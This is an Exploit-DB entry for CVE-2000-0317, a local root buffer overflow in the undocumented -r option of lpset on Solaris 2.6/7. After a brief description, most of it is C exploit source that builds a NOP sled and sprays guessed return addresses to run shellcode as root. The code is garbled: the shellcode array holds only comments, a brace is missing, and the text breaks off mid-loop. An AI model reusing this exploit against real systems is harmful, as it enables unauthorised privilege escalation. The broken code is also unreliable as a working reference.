Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability 2

ID EDB-ID:19873
Type exploitdb
Reporter Theodor Ragnar Gislason
Modified 2000-04-24T00:00:00


Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (2). CVE-2000-0317. Local exploit for solaris platform

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

#include <unistd.h>
#include <stdio.h> 

#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200 

#define NOP 0xac15a16e

#define EXSTART 116

char sparc_shellcode[] =

/* setreuid(0,0) */

/* other stuff */

u_long get_sp() { asm("mov %sp, %i0"); }

main(int argc, char *argv[]) {
        int i,ofs=OFFSET,start=START,end=END;
        u_long ret, *ulp;
        char *buf;

        if (argc > 1) ofs=atoi(argv[1])+8;

        if (!(buf = (char *) malloc(BSIZE+2))) {
                fprintf(stderr, "out of memory\n");

        ret = get_sp() - ofs;

        for (ulp = (u_long *)buf,i=0; ulp < (u_long *)&buf[BSIZE]; i+=4,ulp++)
                *ulp = NOP;

        for (i = start, ulp=(u_long *)&buf[start]; i < end; i+=4) *ulp++ = ret;

        for (